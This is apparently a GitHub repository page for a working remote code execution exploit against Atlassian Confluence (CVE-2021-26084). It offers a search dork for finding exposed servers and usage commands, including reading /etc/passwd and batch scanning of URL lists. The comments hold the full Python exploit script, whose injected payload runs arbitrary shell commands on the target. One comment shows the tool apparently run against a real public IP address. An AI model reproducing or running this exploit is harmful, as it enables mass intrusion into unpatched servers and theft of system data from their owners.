CVE-2021-26084 Remote Code Execution on Confluence Servers

Overview

CVE-2021-26084

CVE-2021-26084 Remote Code Execution on Confluence Servers.

Dork

Fofa:

app="ATLASSIAN-Confluence"

Usage

Show help information.

python PoC.py

Vulnerability verification for individual websites.

python PoC.py -u https://1.1.1.1

Command execution.

python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'

Batch testing.

python PoC.py -f urls.txt

Comments
  • Attaching working code that fixes a small tag-location issue; many thanks to the author for providing the code!

    Line 56: change method="POST" to method="post"

    Working code attached:

    #!/usr/bin/env python3
    # -*- encoding: utf-8 -*-
    """
    @File    :   PoC.py
    @Time    :   2021/09/01 14:16:26
    @Author  :   _0xf4n9x_
    @Version :   1.0
    @Contact :   [email protected]
    """


    import argparse
    import os

    import requests
    import urllib3
    from bs4 import BeautifulSoup

    urllib3.disable_warnings()

    # Action that evaluates the injected expression; shared by poc() and exp().
    ENDPOINT = "/pages/doenterpagevariables.action"
    HEADERS = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}


    def usage():
        print("Eg: \n    python3 PoC.py -u http://127.0.0.1")
        print("    python3 PoC.py -u https://127.0.0.1 -e 'cat /etc/passwd'")
        print("    python3 PoC.py -f urls.txt")


    def poc(host):
        """Verification only: runs ifconfig and looks for its output in the response.
        Returns 1 when the host is vulnerable, 0 otherwise."""
        url = host + ENDPOINT
        params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        try:
            res = requests.post(url, headers=HEADERS, data=params,
                                timeout=10, verify=False)
        except requests.RequestException as err:
            print("[!] " + host + " request failed: " + str(err))
            return 0
        # The original test ('netmask' and 'inet' and 'netmask' in res.text) only ever
        # checked 'netmask'; both ifconfig keywords must actually appear in the body.
        if 'inet' in res.text and 'netmask' in res.text:
            print("[+] " + host + " is vulnerable!")
            return 1
        print("[-] " + host + " is not vulnerable!")
        return 0


    def exp(host, command):
        """Run one command and print its output, which Confluence echoes back inside the form."""
        url = host + ENDPOINT
        params = {
            "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

        res = requests.post(url, headers=HEADERS, data=params,
                            timeout=10, verify=False).text
        # html5lib must be installed (pip install html5lib) or BeautifulSoup raises FeatureNotFound.
        soup = BeautifulSoup(res, "html5lib")
        # Confluence renders the form with a lower-case method attribute; the evaluated
        # expression comes back as the value of the form's second <input>.
        form = soup.find(method="post")
        if form is None:
            print("[-] " + host + ": result form not found in the response")
            return
        content = form.find_all('input')[1]["value"]

        print(content.replace('aaaaaaaa[', '').replace('\n]', ''))


    if __name__ == '__main__':
        parser = argparse.ArgumentParser(
            description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
        parser.add_argument('-u', '--url', type=str,
                            help="vulnerability verification for individual websites")
        parser.add_argument('-e', '--exec', type=str,
                            help="command execution")
        parser.add_argument('-f', '--file', type=str,
                            help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
        args = parser.parse_args()
        # Dispatch on the parsed options rather than on sys.argv positions, so the
        # order of -u/-e no longer matters.
        if args.url and args.exec:
            if poc(args.url) == 1:
                exp(args.url, args.exec)
        elif args.url:
            poc(args.url)
        elif args.file:
            if os.path.isfile(args.file):
                with open(args.file) as target:
                    for host in target.read().splitlines():
                        if poc(host) == 1:
                            with open("success.txt", "a+") as f:
                                f.write(host + "\n")
            else:
                print("[!] file not found: " + args.file)
        else:
            parser.print_help()
            usage()
    
    
    opened by Kar1chan 2
  • Traceback (most recent call last):

    root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/
    [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
    root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e whoami
    [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
    Traceback (most recent call last):
      File "PoC.py", line 100, in <module>
        exp(args.url, args.exec, path)
      File "PoC.py", line 66, in exp
        soup = BeautifulSoup(res, "html5lib")
      File "/usr/local/lib/python3.6/dist-packages/bs4/__init__.py", line 251, in __init__
        % ",".join(features))
    bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library?
    root@ubuntu:~/CVE-2021-26084# python3 PoC.py -u http://51.75.89.1/ -e "whoami"
    [+] http://51.75.89.114//pages/createpage-entervariables.action?SpaceKey=x is vulnerable!
    Traceback (most recent call last):
      File "PoC.py", line 100, in <module>
        exp(args.url, args.exec, path)
      File "PoC.py", line 66, in exp
        soup = BeautifulSoup(res, "html5lib")
      File "/usr/local/lib/python3.6/dist-packages/bs4/__init__.py", line 251, in __init__
        % ",".join(features))
    bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: html5lib. Do you need to install a parser library?
    root@ubuntu:~/CVE-2021-26084#

    opened by websecer 0
Owner
FQ Hsu